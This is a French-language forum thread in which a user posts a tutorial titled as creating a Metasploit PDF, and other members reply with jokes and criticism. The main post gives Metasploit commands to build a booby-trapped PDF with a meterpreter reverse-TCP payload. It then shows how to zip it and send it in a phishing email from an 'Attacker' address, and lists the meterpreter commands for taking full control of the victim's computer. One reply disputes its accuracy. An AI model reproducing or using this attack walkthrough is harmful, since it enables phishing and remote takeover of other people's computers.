Informatique, téléphonie & multimédia

Yabiladi

Annonces

Général

Actualité du Maroc et du Monde

Voyages & vacances

Culture, Histoire et régions du Maroc

Aide, astuces & bons plans

Formalités administratives & aide juridique

Sports

Halka : Blagues, poèmes, jeux, détente

Yabiladies

Mariage et administration

Organisation mariage # Maroc

Organisation mariage # International

Relations sentimentales

Problèmes de couple

Relations familiales et sociales

En attendant bébé...

Bébés, enfants, et éducation

Mode & beauté

Santé, psychologie & diététique

Ch'hiwates : Cuisine & gastronomie

Islam

Apprendre l'islam : prière, dou3a, hadith...

Islam & pensées religieuses

Ramadan 2024

Interprétation des rêves, roqya, djinn

MediaTIC

Informatique, téléphonie & multimédia

TV, Ciné, musique, people

International

Foro de Marruecos y de Marroquíes

Morocco # English board

منتدى المغرب و المغاربة حول العالم

Salam tout le monde!

ce soir je vais vous expliqué comment crée un métasploit dans un pdf.

Cela ne fonctionne qu'avec kali linux.

Bon tout d'abord,on ouvre un terminal et on tape ceci

start-network
dhclient eth0

ensuite on démarre métasploit

msfconsole

on tape search pdf et on recherche parmi les pdf que nous avons déjà.

on sélectionne celui qui nous intéresse

use windows/fileformat/adobe_libtiff
info
show options

ensuite on nomme notre pdf
set FILENAME tuto.pdf

on donne la destination du pdf
setg OUTPUTPATH /root

ensuite on choisi le PAYLOAD
setg PAYLOAD windows/meterpreter/reverse/_tcp

on paramètre le PAYLOAD comme ceci
setg LHOST 192.168.0.33
setg LPORT 4444
show options

ensuite on exécute
exploit
use exploit/multi/handler
show option
exploit

en attendant que tout ça s’exécute nous allons envoyé le mail piéger .

Nous commençons par la création d'un fichier zip pour y mettre notre pdf

zip meeting.zip tuto.pdf (je met tuto comme exemple)

ensuite on envoie le mail

send Email -f "Attacker <[email protected]>" -t [email protected] -u "Top secret stuff" -m "Here are the minutes from the last meeting. The password is: g0tmi1k" -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass]

Autre variante d'un fichier zip avec mdp

zip -e meeting.zip tuto.pdf
g0tmi1k
g0tmi1k

send Email -f "Attacker <[email protected]>" -t [email protected] -u "Top secret stuff" -m "Here are the minutes from the last meeting. The password is: g0tmi1k" -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass]

Pour avoir des infos :

sessions -l -v
sessions -i 2
sysinfo
getuid
getsystem
getuid

Si tout ce passe bien, vous avez un acces total à l'ordinateur infecter par votre fichier.

Explication des légendes :

sendEmail =

-f "Attacker <[email protected]>" => Adresse du Hacker
-t [email protected] => Adresse de la victime
-u "Top secret stuff" => Objet du mail
-m "Here are the minutes from the last meeting." => Le message du mail
-a /root/meeting.zip => Le chemin du fichier en qui va être mis en pièce jointes
-s [smtp host] => adresse IP de la boite mail du Hacker
-xu [smtp user] => Login de la boite mail du Hacker
-xp [smtp pass] => Le mot de passe la boite mail du Hacker

Bon Hacking à tout le monde.



Modifié 4 fois. Dernière modification le 04/05/16 22:28 par CyberGhost.

Merci beaucoup pour ces précieuses infos mais je pense qu'il faut faire un tuto pour avant, bien avant...ces étapes. Au moins en ce qui me concerne.

Mdr sacré toi !

Pourquoi tu n'as pas encore dépasser le stade novice ?

Citation
ante a écrit:
Merci beaucoup pour ces précieuses infos mais je pense qu'il faut faire un tuto pour avant, bien avant...ces étapes. Au moins en ce qui me concerne.

LOL

Citation
CyberGhost a écrit:
Mdr sacré toi !

Pourquoi tu n'as pas encore dépasser le stade novice ?

Salut c'est koi Kali une Mercedes, une déesse, le non de ton PC ou le bar ou tu te cache ptdr.....

Non je rigole mais beaucoup ne connaisse pas .
Donc je crois qu'il faut leur dire que c'est une alternative à Windows.

Enfin je dis sa je dis rien Mr lol.....

Citation
pharahon a écrit:
Salut c'est koi Kali une Mercedes, une déesse, le non de ton PC ou le bar ou tu te cache ptdr.....

Non je rigole mais beaucoup ne connaisse pas .
Donc je crois qu'il faut leur dire que c'est une alternative à Windows.

Enfin je dis sa je dis rien Mr lol.....

Ptdr wech mon pote tu vas bien et la famille les enfants ça va aussi j'espère ?

Citation
pharahon a écrit:
Salut c'est koi Kali une Mercedes, une déesse, le non de ton PC ou le bar ou tu te cache ptdr.....

Non je rigole mais beaucoup ne connaisse pas .
Donc je crois qu'il faut leur dire que c'est une alternative à Windows.

Enfin je dis sa je dis rien Mr lol.....

Il n'est pas indispensable d'avoir kali linux. Metasploit peut s'installer sur n'importe quel disrto linux et même sur windows. Il faut se renseigner un peu avant de diffuser de fausse info. Et parler du port forwarding serait bien aussi car ton tuto ne fonctionne qu'en local et c'est carrément inutile voir idiot vue que c'est une attaque via email

Comment créer un métasploit dans un pdf ça ne veut rien dire.
Metasploit est un framework. C'est un payload que tu met dans ton pdf et tu ne le créer pas car il est déjà créer. Créer un payload demande bien plus de travail et de recherche que suivre des tuto metasploit notamment de solide connaissances dans le fonctionnement de la mémoire et de microprocesseur, du language d'assemblage, du C et bien d'autre encore. Et puis Absolument TOUS les payloads de metasploit son déjà référencés par la majorité des anti-virus et les failles toutes comblées par des mise à jour. C'est a ça que sert metasploit, à améliorer la sécurité informatique donc tous ce qu'il contient en base de donnée est partagé aux anti-virus. Mais j'admet qu'on peut s'en servir avec d'autre outil pour faire du zero day, du reverse et créer soi même des payloads.